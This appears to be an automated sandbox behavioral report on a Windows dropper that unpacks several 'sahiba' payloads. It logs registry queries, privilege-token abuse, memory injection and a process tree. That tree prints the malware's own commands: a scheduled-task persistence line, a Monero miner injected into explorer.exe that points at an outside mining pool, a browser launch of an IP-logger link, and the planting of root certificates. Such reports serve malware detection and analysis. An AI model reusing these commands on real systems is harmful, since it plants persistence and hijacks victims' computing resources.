puFib_mN6HqGzK5uF14kFFxZ.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 puFib_mN6HqGzK5uF14kFFxZ.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 DnSUr5m02PxtLbSxliYLhS_O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet puFib_mN6HqGzK5uF14kFFxZ.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet rundll32.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4084 schtasks.exe 4128 schtasks.exe 6816 schtasks.exe 6652 schtasks.exe 6004 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 6276 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 768 tasklist.exe 5828 tasklist.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
msedge.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 996 taskkill.exe 1032 taskkill.exe -
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Toolbar Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 -
Modifies registry class 21 IoCs
Processes:
rundll32.exemsedge.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff -
Processes:
sahiba_3.exerundll32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 sahiba_3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e sahiba_3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D063264BC76898D4F1BD86741FD9D923F8DF8FA6 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D063264BC76898D4F1BD86741FD9D923F8DF8FA6\Blob = 030000000100000014000000d063264bc76898d4f1bd86741fd9d923f8df8fa620000000010000009f0200003082029b30820204a0030201020208321c38f40e72a9c1300d06092a864886f70d01010b05003074311f301d06035504030c165468617774652054696d657374636d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3230303331333039303132335a170d3234303331323039303132335a3074311f301d06035504030c165468617774652054696d657374636d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100aff440c71e64310d8382ce98ce1356970304929b4ef23420072ffc7a32d0d843005800f48fd7c9b3752dea2e9a64576c6465c0c456d96bcdd22fc8ae62f94e009b50b5b8974d5db7e4b30a407728dde74aa9748958a324629f014bcdc9e6be87c2c6eae6b38edc3512ce41fb98c2cbf25a5412e6d9190b62724acb5a457527810203010001a3363034300f0603551d130101ff040530030101ff30210603551d11041a301882165468617774652054696d657374636d70696e67204341300d06092a864886f70d01010b0500038181002e2a675037f091a5b618878aa25b949d164662430b98dde2b5327bc819c18d2a8970f20146f36e54ed9ab3970e4c4fb91d9773063d7d8f71da2eaf63a18e806cccd557c394b15299eceb8e3650c0e3a51d9a2636b0422facf25f8afa8cff0a3fced0b992821d4aac8039c124515ea6a70e41475e052733f37bf76d2638f79394 rundll32.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid process 676 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
sahiba_2.exejfiag3g_gg.exeChrome2.exepid process 4792 sahiba_2.exe 4792 sahiba_2.exe 1780 jfiag3g_gg.exe 1780 jfiag3g_gg.exe 256 Chrome2.exe 256 Chrome2.exe 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 676 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
sahiba_2.exepid process 4792 sahiba_2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
msedge.exepid process 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
sahiba_4.exesahiba_5.exeP1GlorySetp.exeChrome2.exesystem64.exeBIRZAC~1.EXEsvchost.exeq7qe_a0ikJj9r1Tt_dSq8ad5.exeItMkYX_n_SCidLEm796l_vOZ.exedescription pid process Token: SeDebugPrivilege 4756 sahiba_4.exe Token: SeDebugPrivilege 1272 sahiba_5.exe Token: SeDebugPrivilege 404 P1GlorySetp.exe Token: SeDebugPrivilege 256 Chrome2.exe Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeDebugPrivilege 3584 system64.exe Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeDebugPrivilege 1548 BIRZAC~1.EXE Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeTcbPrivilege 2268 svchost.exe Token: SeTcbPrivilege 2268 svchost.exe Token: SeTcbPrivilege 2268 svchost.exe Token: SeTcbPrivilege 2268 svchost.exe Token: SeTcbPrivilege 2268 svchost.exe Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeShutdownPrivilege 676 Token: SeCreatePagefilePrivilege 676 Token: SeDebugPrivilege 5332 q7qe_a0ikJj9r1Tt_dSq8ad5.exe Token: SeDebugPrivilege 5472 ItMkYX_n_SCidLEm796l_vOZ.exe Token: SeShutdownPrivilege 676 -
Suspicious use of FindShellTrayWindow 18 IoCs
Processes:
msedge.exerundll32.exeAccostarmi.exe.pifpid process 3492 msedge.exe 676 676 3492 msedge.exe 676 3492 msedge.exe 676 676 676 676 5680 rundll32.exe 5552 Accostarmi.exe.pif 676 676 5552 Accostarmi.exe.pif 5552 Accostarmi.exe.pif 676 676 -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Accostarmi.exe.pifpid process 5552 Accostarmi.exe.pif 5552 Accostarmi.exe.pif 5552 Accostarmi.exe.pif -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid process 676 676 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesahiba_1.exesahiba_8.exesahiba_7.exeInstall2.EXEdescription pid process target process PID 3796 wrote to memory of 2504 3796 f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe setup_installer.exe PID 3796 wrote to memory of 2504 3796 f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe setup_installer.exe PID 3796 wrote to memory of 2504 3796 f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe setup_installer.exe PID 2504 wrote to memory of 1680 2504 setup_installer.exe setup_install.exe PID 2504 wrote to memory of 1680 2504 setup_installer.exe setup_install.exe PID 2504 wrote to memory of 1680 2504 setup_installer.exe setup_install.exe PID 1680 wrote to memory of 1640 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 1640 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 1640 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4980 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4980 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4980 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 3724 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 3724 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 3724 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4236 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4236 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4236 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4860 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4860 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4860 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4856 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4856 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4856 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4824 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4824 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4824 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4908 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4908 1680 setup_install.exe cmd.exe PID 1680 wrote to memory of 4908 1680 setup_install.exe cmd.exe PID 4824 wrote to memory of 1164 4824 cmd.exe sahiba_7.exe PID 4824 wrote to memory of 1164 4824 cmd.exe sahiba_7.exe PID 4824 wrote to memory of 1164 4824 cmd.exe sahiba_7.exe PID 4860 wrote to memory of 1272 4860 cmd.exe sahiba_5.exe PID 4860 wrote to memory of 1272 4860 cmd.exe sahiba_5.exe PID 4908 wrote to memory of 4748 4908 cmd.exe sahiba_8.exe PID 4908 wrote to memory of 4748 4908 cmd.exe sahiba_8.exe PID 4908 wrote to memory of 4748 4908 cmd.exe sahiba_8.exe PID 4236 wrote to memory of 4756 4236 cmd.exe sahiba_4.exe PID 4236 wrote to memory of 4756 4236 cmd.exe sahiba_4.exe PID 4980 wrote to memory of 4792 4980 cmd.exe sahiba_2.exe PID 4980 wrote to memory of 4792 4980 cmd.exe sahiba_2.exe PID 4980 wrote to memory of 4792 4980 cmd.exe sahiba_2.exe PID 1640 wrote to memory of 4784 1640 cmd.exe sahiba_1.exe PID 1640 wrote to memory of 4784 1640 cmd.exe sahiba_1.exe PID 1640 wrote to memory of 4784 1640 cmd.exe sahiba_1.exe PID 3724 wrote to memory of 1504 3724 cmd.exe sahiba_3.exe PID 3724 wrote to memory of 1504 3724 cmd.exe sahiba_3.exe PID 3724 wrote to memory of 1504 3724 cmd.exe sahiba_3.exe PID 4856 wrote to memory of 1912 4856 cmd.exe sahiba_6.exe PID 4856 wrote to memory of 1912 4856 cmd.exe sahiba_6.exe PID 4856 wrote to memory of 1912 4856 cmd.exe sahiba_6.exe PID 4784 wrote to memory of 308 4784 sahiba_1.exe sahiba_1.exe PID 4784 wrote to memory of 308 4784 sahiba_1.exe sahiba_1.exe PID 4784 wrote to memory of 308 4784 sahiba_1.exe sahiba_1.exe PID 4748 wrote to memory of 256 4748 sahiba_8.exe Chrome2.exe PID 4748 wrote to memory of 256 4748 sahiba_8.exe Chrome2.exe PID 1164 wrote to memory of 2104 1164 sahiba_7.exe jfiag3g_gg.exe PID 1164 wrote to memory of 2104 1164 sahiba_7.exe jfiag3g_gg.exe PID 1164 wrote to memory of 2104 1164 sahiba_7.exe jfiag3g_gg.exe PID 4748 wrote to memory of 848 4748 sahiba_8.exe Install2.EXE PID 4748 wrote to memory of 848 4748 sahiba_8.exe Install2.EXE PID 848 wrote to memory of 3464 848 Install2.EXE BIRZAC~1.EXE PID 848 wrote to memory of 3464 848 Install2.EXE BIRZAC~1.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe"C:\Users\Admin\AppData\Local\Temp\f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_8.exesahiba_8.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\system64.exe"C:\Users\Admin\AppData\Roaming\system64.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\system64.exe"C:\Users\Admin\AppData\Roaming\system64.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'11⤵
- Creates scheduled task(s)
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=8010⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 464 -s 28811⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 464 -s 29211⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=808⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1344 -s 3009⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1344 -s 3049⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Install2.EXE"C:\Users\Admin\AppData\Local\Temp\Install2.EXE"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSBBDB.tmp\Install.cmd" "8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Df2r79⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
